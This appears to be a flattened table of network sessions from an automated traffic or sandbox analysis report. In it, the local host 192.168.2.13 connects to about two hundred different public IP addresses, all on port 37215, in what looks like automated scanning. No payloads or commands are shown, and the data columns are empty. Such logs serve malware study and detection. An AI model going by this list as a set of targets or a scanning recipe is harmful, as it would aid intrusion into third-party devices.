                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18362192.168.2.1357910204.105.180.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18363192.168.2.1341532190.77.194.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18364192.168.2.1356282157.139.8.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18365192.168.2.135178253.234.217.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18366192.168.2.1359232157.234.25.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18367192.168.2.1346288158.72.86.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18368192.168.2.133444641.225.94.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18369192.168.2.1360918197.219.113.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18370192.168.2.1359362157.154.144.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18371192.168.2.1346586197.226.189.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18372192.168.2.133536891.185.49.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18373192.168.2.1355606197.194.96.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18374192.168.2.133682641.227.181.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18375192.168.2.1333396157.69.195.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18376192.168.2.1356080157.130.134.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18377192.168.2.135996641.45.82.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18378192.168.2.1339752197.71.97.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18379192.168.2.134022841.156.241.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18380192.168.2.1343654157.202.237.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18381192.168.2.135982017.163.236.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18382192.168.2.1338404197.75.46.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18383192.168.2.1350342120.184.215.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18384192.168.2.1353248157.69.200.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18385192.168.2.1340234197.143.220.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18386192.168.2.135768041.136.234.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18387192.168.2.133424241.24.56.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18388192.168.2.134492241.234.140.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18389192.168.2.1353172178.132.160.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18390192.168.2.1351666157.57.74.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18391192.168.2.135082072.77.237.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18392192.168.2.1333312197.201.31.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18393192.168.2.1345020157.69.59.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18394192.168.2.1342398157.45.104.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18395192.168.2.135428453.1.117.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18396192.168.2.134147441.185.16.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18397192.168.2.1347120157.94.62.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18398192.168.2.134808641.109.106.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18399192.168.2.1345316157.214.213.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18400192.168.2.1332994197.182.56.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18401192.168.2.1351404197.41.131.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18402192.168.2.1348198197.91.180.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18403192.168.2.1340568157.211.49.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18404192.168.2.135421883.33.51.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18405192.168.2.133381041.182.47.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18406192.168.2.135895641.63.87.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18407192.168.2.1349486197.22.114.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18408192.168.2.1336382157.191.121.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18409192.168.2.1345546157.55.128.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18410192.168.2.1336916197.237.60.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18411192.168.2.1357188173.181.159.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18412192.168.2.1340962147.146.105.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18413192.168.2.1340822197.54.85.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18414192.168.2.134466671.247.233.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18415192.168.2.1343730197.83.196.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18416192.168.2.135524298.234.190.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18417192.168.2.1356382138.207.200.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18418192.168.2.1337788157.23.42.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18419192.168.2.1359294157.226.43.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18420192.168.2.1349434197.107.41.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18421192.168.2.134516848.176.125.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18422192.168.2.1343966157.123.215.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18423192.168.2.1334036157.101.237.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18424192.168.2.133939841.154.176.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18425192.168.2.1357926157.7.234.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18426192.168.2.1348364200.143.132.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18427192.168.2.1342520157.45.219.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18428192.168.2.1352074197.255.192.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18429192.168.2.1344030157.37.91.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18430192.168.2.1339840157.0.114.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18431192.168.2.133890641.82.228.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18432192.168.2.1334406185.238.109.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18433192.168.2.1356976197.94.47.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18434192.168.2.134899041.45.74.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18435192.168.2.135208832.76.80.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18436192.168.2.1359828157.220.181.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18437192.168.2.1333994157.39.96.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18438192.168.2.134052241.241.193.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18439192.168.2.1337552197.212.120.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18440192.168.2.1340084157.92.205.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18441192.168.2.1359130197.83.179.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18442192.168.2.1336072197.65.83.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18443192.168.2.1334680157.12.46.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18444192.168.2.1360738197.160.23.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18445192.168.2.134860224.189.10.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18446192.168.2.134330441.1.204.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18447192.168.2.1333746197.134.120.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18448192.168.2.136077017.204.61.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18449192.168.2.134056241.5.233.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18450192.168.2.135182098.123.195.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18451192.168.2.1359430157.4.33.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18452192.168.2.135834441.85.118.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18453192.168.2.1346078197.147.34.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18454192.168.2.134081241.58.175.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18455192.168.2.1360838212.195.33.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18456192.168.2.133418041.199.91.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18457192.168.2.133815641.50.39.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18458192.168.2.1360930195.170.48.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18459192.168.2.1354880197.20.61.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18460192.168.2.1348108157.223.227.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18461192.168.2.1347934197.101.212.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18462192.168.2.1357922157.102.235.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18463192.168.2.1345304144.95.84.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18464192.168.2.134802041.232.200.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18465192.168.2.1339628197.14.201.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18466192.168.2.134864641.7.135.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18467192.168.2.1336574197.211.0.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18468192.168.2.134498099.174.58.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18469192.168.2.1345742157.235.3.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18470192.168.2.1333298197.238.202.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18471192.168.2.1336000177.47.215.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18472192.168.2.1342120157.131.22.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18473192.168.2.1358742197.226.204.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18474192.168.2.135847661.149.57.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18475192.168.2.134233041.234.59.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18476192.168.2.1355350197.108.90.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18477192.168.2.1335922197.180.73.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18478192.168.2.1337474157.111.197.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18479192.168.2.1357696157.215.116.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18480192.168.2.134972641.126.21.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18481192.168.2.1339964157.141.38.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18482192.168.2.133682841.255.169.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18483192.168.2.1345858157.180.167.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18484192.168.2.133821441.107.103.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18485192.168.2.135208641.231.207.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18486192.168.2.1352018197.245.166.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18487192.168.2.1353886157.234.16.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18488192.168.2.1348206197.89.42.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18489192.168.2.1343934197.32.177.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18490192.168.2.1341720197.97.105.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18491192.168.2.1342952157.114.169.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18492192.168.2.1351336197.224.36.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18493192.168.2.133877041.110.107.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18494192.168.2.1352208157.69.124.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18495192.168.2.133287241.184.227.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18496192.168.2.135889641.129.200.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18497192.168.2.1354600197.232.157.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18498192.168.2.1350736197.121.224.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18499192.168.2.1337614129.176.193.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18500192.168.2.133704641.193.129.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18501192.168.2.1346412197.16.157.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18502192.168.2.133954241.146.84.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18503192.168.2.1332902157.52.89.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18504192.168.2.1337240109.149.89.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18505192.168.2.133905441.54.208.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18506192.168.2.1351262157.82.40.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18507192.168.2.1352732157.243.174.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18508192.168.2.134769041.253.27.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18509192.168.2.135434841.158.38.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18510192.168.2.1352522157.4.112.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18511192.168.2.1350196157.173.83.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18512192.168.2.1349086157.65.221.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18513192.168.2.1336498197.20.229.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18514192.168.2.1334312157.10.47.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18515192.168.2.133633841.27.53.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18516192.168.2.1337338157.222.137.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18517192.168.2.134972841.96.164.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18518192.168.2.136067241.151.65.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18519192.168.2.135228641.101.25.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18520192.168.2.134130841.228.164.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18521192.168.2.1352346157.231.141.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18522192.168.2.1339110157.158.75.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18523192.168.2.1339304157.175.73.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18524192.168.2.1343046197.68.194.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18525192.168.2.1355942157.108.96.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18526192.168.2.1356738157.101.199.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18527192.168.2.1353218197.242.224.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18528192.168.2.136015441.64.127.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18529192.168.2.1338714197.146.140.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18530192.168.2.1336346138.230.96.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18531192.168.2.135213641.134.0.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18532192.168.2.1357888197.47.22.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18533192.168.2.1343666157.237.211.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18534192.168.2.1345716157.168.223.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18535192.168.2.135255241.230.28.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18536192.168.2.1338848109.244.229.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18537192.168.2.1355710197.251.44.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18538192.168.2.135927241.18.169.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18539192.168.2.1338076197.70.25.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18540192.168.2.133828218.166.153.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18541192.168.2.1353408191.61.199.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18542192.168.2.1337150109.74.221.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18543192.168.2.1359400126.235.220.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18544192.168.2.134020062.61.179.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18545192.168.2.1335810157.67.250.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18546192.168.2.1354904168.243.70.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18547192.168.2.1338356197.211.210.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18548192.168.2.1337262157.126.161.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18549192.168.2.1354720132.176.154.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18550192.168.2.134652645.164.81.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18551192.168.2.134786889.7.248.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18552192.168.2.1356474120.58.109.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18553192.168.2.1357738197.108.106.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18554192.168.2.135126041.207.20.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18555192.168.2.1350856197.48.12.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18556192.168.2.133723241.76.120.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18557192.168.2.1354502222.115.135.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18558192.168.2.133814441.106.49.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18559192.168.2.134699841.78.169.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18560192.168.2.1355168197.116.160.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18561192.168.2.1356226157.152.215.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18562192.168.2.1344854197.61.247.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18563192.168.2.1356334104.92.44.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18564192.168.2.1356702157.212.131.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18565192.168.2.1358482205.162.90.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18566192.168.2.135800641.34.150.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18567192.168.2.1344410197.88.64.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18568192.168.2.1336238157.223.116.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18569192.168.2.1350424197.116.243.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18570192.168.2.1344924157.93.159.20837215
                                                  TimestampBytes transferredDirectionData


